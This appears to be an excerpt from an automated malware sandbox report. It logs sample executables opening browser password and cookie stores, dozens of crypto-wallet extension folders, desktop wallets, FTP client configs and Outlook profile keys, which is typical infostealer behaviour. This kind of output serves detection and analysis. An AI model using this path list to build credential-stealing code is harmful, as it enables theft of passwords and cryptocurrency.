Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS
